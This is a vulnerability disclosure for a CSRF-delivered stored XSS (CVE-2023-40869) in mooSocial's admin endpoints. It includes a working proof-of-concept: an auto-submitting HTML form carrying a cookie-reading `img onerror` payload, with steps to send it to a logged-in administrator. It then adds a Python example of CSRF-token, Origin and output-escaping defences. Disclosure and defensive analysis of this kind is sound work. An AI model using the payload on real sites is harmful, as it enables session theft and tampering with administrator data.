CVE-2023-40869: GitHub - MinoTauro2020/CVE-2023-40869: Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_me

Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.



# CVE-2023-40869 Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions

Stored XSS delivered via CSRF: the admin save endpoints accept a cross-site POST without a CSRF token, and the submitted value is stored and later rendered without output encoding.

## Paths affected

- http://admin-socialcommerce.moosocial.com/admin/group/group_categories
- http://admin-socialcommerce.moosocial.com/admin/coupon/
- http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit_menu/6

## PoC

1. Create an HTML file with the following content, including the XSS payload (the author notes the payload in the `data[name]` value is to be HTML-encoded; it is shown raw here as in the original):

```html
<html>
<body>
  <form action="http://admin-socialcommerce.moosocial.com/admin/group/group_categories/save" method="POST">
    <input type="hidden" name="data[id]" value="" />
    <!-- payload in this example, encoded: test"><img src=a onerror=alert(document.cookie)>test -->
    <input type="hidden" name="data[name]" value="test"><img src=a onerror=alert(document.cookie)>test" />
    <input type="hidden" name="data[type]" value="Group" />
    <input type="hidden" name="data[header]" value="0" />
    <input type="hidden" name="data[header]" value="1" />
    <input type="hidden" name="data[parent_id]" value="0" />
    <input type="hidden" name="data[description]" value="" />
    <input type="hidden" name="data[active]" value="0" />
    <input type="hidden" name="data[active]" value="1" />
    <input type="hidden" name="data[everyone]" value="0" />
    <input type="hidden" name="data[everyone]" value="1" />
    <input type="submit" value="Submit request" />
  </form>
  <script>
    history.pushState('', '', '/');
    document.forms[0].submit();
  </script>
</body>
</html>
```

2. Save it as, for example, `test.html`.

3. Send it to the victim (an authenticated mooSocial administrator).

4. When the victim opens `test.html` in their browser and triggers the submission, the script posts the form to the admin endpoint with the victim's session, and the payload is stored in the database.
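The two server-side controls that break this chain, as an added example that is not part of the mooSocial code base or of the original PoC: a CSRF check on the admin save endpoint (synchronizer token bound to the session plus an Origin/Referer comparison), and HTML-escaping of the stored name on output so that anything that does reach the database is displayed as text rather than parsed as markup. The handler names, the `Request`/`Session` classes and the in-memory `db` list are assumptions made for this example; only the origin and the payload string come from the PoC above.

```python
"""Added example (not mooSocial code). Shows why the PoC form is rejected
once the save endpoint validates a CSRF token and the request origin, and why
escaping on output neutralises the payload even if it was stored."""
import html
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "http://admin-socialcommerce.moosocial.com"  # origin from the PoC paths

# Payload quoted in the PoC, reused here as constructed test input.
POC_PAYLOAD = 'test"><img src=a onerror=alert(document.cookie)>test'


@dataclass
class Session:
    # Token generated per session; an attacker's page cannot read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:  # hypothetical minimal request object
    method: str
    headers: dict
    form: dict
    session: Session


def csrf_ok(req: Request) -> bool:
    """A state-changing request passes only if the submitted token equals the
    session-bound one (constant-time compare) AND the Origin (or Referer)
    header, which browsers attach to cross-site POSTs, is our own origin."""
    if req.method != "POST":
        return False
    submitted = req.form.get("_csrf", "")
    if not hmac.compare_digest(submitted, req.session.csrf_token):
        return False
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    return origin.startswith(SITE_ORIGIN)


db: list[dict] = []  # stand-in for the group_categories table


def save_group_category(req: Request) -> tuple[int, str]:
    """Hypothetical admin 'save' handler; returns (status, body)."""
    if not csrf_ok(req):
        return 403, "CSRF check failed"
    db.append({"name": req.form.get("data[name]", "")})
    return 200, "saved"


def render_category_list() -> str:
    """Escape on output: html.escape turns < > & " ' into entities."""
    items = "".join(f"<li>{html.escape(row['name'], quote=True)}</li>" for row in db)
    return f"<ul>{items}</ul>"


def demo() -> dict:
    """Runs the PoC request, a legitimate admin request, and the output-encoding
    check; returns the observable results for inspection."""
    db.clear()
    victim = Session()

    # 1. The PoC: auto-submitted from an attacker-controlled page. No token,
    #    and the browser sends a foreign Origin.
    attack = Request("POST", {"Origin": "http://attacker.example"},
                     {"data[name]": POC_PAYLOAD}, victim)
    attack_status, _ = save_group_category(attack)

    # 2. A legitimate admin submission carrying the session-bound token.
    legit = Request("POST", {"Origin": SITE_ORIGIN},
                    {"data[name]": "Sports", "_csrf": victim.csrf_token}, victim)
    legit_status, _ = save_group_category(legit)

    # 3. Defence in depth: pretend the payload reached the table anyway
    #    (e.g. through an older, unprotected path) and render the list.
    db.append({"name": POC_PAYLOAD})
    page = render_category_list()
    return {"attack_status": attack_status, "legit_status": legit_status,
            "rows": len(db), "page": page}


if __name__ == "__main__":
    print(demo())
```

Marking the session cookie `SameSite=Lax` or `Strict` adds a third, browser-enforced layer: the auto-submitted cross-site POST would then arrive without the admin's cookie at all. The token check above is still needed for browsers and deployments where that attribute is not honoured.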
